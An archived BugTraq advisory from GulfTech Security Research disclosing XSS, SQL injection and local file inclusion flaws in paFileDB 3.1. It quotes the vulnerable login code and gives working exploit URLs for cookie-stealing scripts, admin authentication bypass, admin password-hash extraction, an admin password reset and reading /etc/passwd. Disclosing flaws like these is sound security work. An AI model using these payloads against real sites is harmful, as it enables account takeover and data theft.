Multiple paFileDB Vulnerabilities

From: GulfTech Security Research (security_at_gulftech.org)
Date: 06/15/05

  • Next message: phr1ker_at_hushmail.com: "is this new? vuln info @ Adobe" 
    Date: Tue, 14 Jun 2005 22:07:34 -0500
To: BugTraq <bugtraq@securityfocus.com>, Secunia Research <vuln@secunia.com>, OSVDB <moderators@osvdb.org>

    ##########################################################
    # GulfTech Security Research June 14th, 2005
    ##########################################################
    # Vendor : php Arena
    # URL : http://www.phparena.net/pafiledb.php
    # Version : paFileDB 3.1 && Earlier
    # Risk : Multiple Vulnerabilities
    ##########################################################

    Description:
    paFileDB is a popular open source web application offered by
    php Arena. paFileDB allows webmasters to open up an interactive
    file repository on their website. There are a number of
    vulnerabilities in paFileDB that may allow for an attacker to
    include arbitrary files, retrieve sensitive user and/or database
    information, and completely bypass admin, and team member
    authentication. Users should upgrade immediately.

    Cross Site Scripting:
    There are a number of cross site scripting issues in the paFileDB
    software. Majority of these cross site scripting issues stem from
    concatenated variables never being initialized.

    http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22
    %3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

    http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
    script%3Ealert%28document.cookie%29%3C%2Fscript%3E

    http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E
    %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

    These vulnerabilities can be used to render hostile code in the
    context of the victims browser, and in turn disclose sensitive
    information to an attacker.

    SQL Injection:
    There are a number of SQL Injection vulnerabilities in paFileDB,
    but it should be noted that to exploit these issues magic quotes
    gpc must be off. Also, magic quotes off seems to be the default
    php.ini settings now so I do consider these issues fairly high
    risk. The most serious of the SQL Injection issues lies in the
    administrative login.

    if ($login == "do")
    {
        $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin
    WHERE admin_username = '$formname'", 1);
        $formpw = md5($formpass);
        if ($formpw == $admin[admin_password])
        {
            $adminip = getenv ("REMOTE_ADDR");
            $ip = md5($adminip);
            $user = $formname;
            $pass = $formpw;

            if ($authmethod == "cookies")
            {
                $cookiedata = "$ip|$formname|$formpw";
                setcookie("pafiledbcookie", $cookiedata);
            }

            header("Location: admin.php");
    }

    The variable $formname is taken directly from the submitted login form
    and executed in the query, so if magic quotes gpc an attacker can
    use UNION SELECT to bypass admin authentication!

    http://pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION
    %20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
    %20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
    %3E%3E+Log+In+%3C%3C&action=admin&login=do

    The query above uses a UNION SELECT to get the admin username, id, email etc
    but we specify the password hash as the md5 encrypted value of the $formpass
    variable. This same issue applies to the team login, and also the auth.php
    scripts in the /teams/ and /admin/ directory.

    There is also an SQL Injection vulnerability that will allow for team
    members to
    gain the administrative password hash and escalate their privileges to
    admin.

    http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
    admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
    Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
    pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

    http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
    admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
    201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
    =%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

    Last but not least there is a SQL Injection vulnerability in search.php
    because the $string variable is never sanitized.

    There is one SQL Injection issue in paFileDB that does not require magic_
    quotes_gpc to be disabled. This particular issue will let a team member
    run any sql command that they like, including making themselves an admin.

    http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
    query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
    20WHERE%201/*

    The above url would successfully set the admin password to 1337 if ran by
    a logged in team member or admin. This vulnerability exists because the
    $query variable is never declared before being concatenated so we can in
    turn hijack the $query variable and run any sql commands we like.

    Local File Include Vulnerability:
    paFileDB is vulnerable to a local file inclusion vulnerability that may
    allow for an attacker to execute arbitrary local scripts, or read/access
    arbitrary files on the webserver. Let's look at pafiledb.php

    if ($login == "do") { include "./includes/$action/login.php"; exit; }
    if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
    if ($tm == "logout") { include "./includes/team/logout.php"; exit; }

    The $action variable is never sanitized and vulnerable to directory
    traversal sequences.

    http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do

    This vulnerability exists on all paFileDB configurations, as all GPC
    is extracted to global variables.

    Solution:
    A new version of paFileDB has been released, so upgrading is advised.

    Related Info:
    The original advisory can be found at the following location
    http://www.gulftech.org/?node=research&article_id=00082-06142005

    Credits:
    James Bercegay of the GulfTech Security Research Team

  • Next message: phr1ker_at_hushmail.com: "is this new? vuln info @ Adobe"

    Relevant Pages

    • Pixel Post Multiple Vulnerabilities
      ... XSS, and SQL Injection providing full access to admin area, providing upload any type of files capabilities.. ... With this vulnerability we can fetch almost any data from the database, ... You can perform a XSS attack when commenting a post because the comment, the name, the url, and nor the email are properly sanitized. ...
      (Bugtraq)
    • SEO borad: SQL injection
      ... VULNERABILITY CLASS: SQL injection through cookie ... die('You must be logged as admin to access the admin panel'); ... An attacker can inject SQL statement through cookie. ...
      (Bugtraq)
    • PaFileDB 3.1 - SQL-Injection
      ... Vulnerability discovered by deluxe89 ... paFileDB is designed to allow webmasters have a database of files for download on their site. ... Vulnerable Code: ... SQL-Injection through $user. ...
      (Bugtraq)
    • [Full-disclosure] Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection
      ... Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection ... Invision Power Board (IPB) is a professional forum system that has ... LOCAL FILE INCLUSION VULNERABILITY ...
      (Full-Disclosure)
    • Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection
      ... Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection ... Invision Power Board (IPB) is a professional forum system that has been built ... LOCAL FILE INCLUSION VULNERABILITY ... It is possible to include an arbitrary php file stored on the server in any ...
      (Bugtraq)
    • Quantcast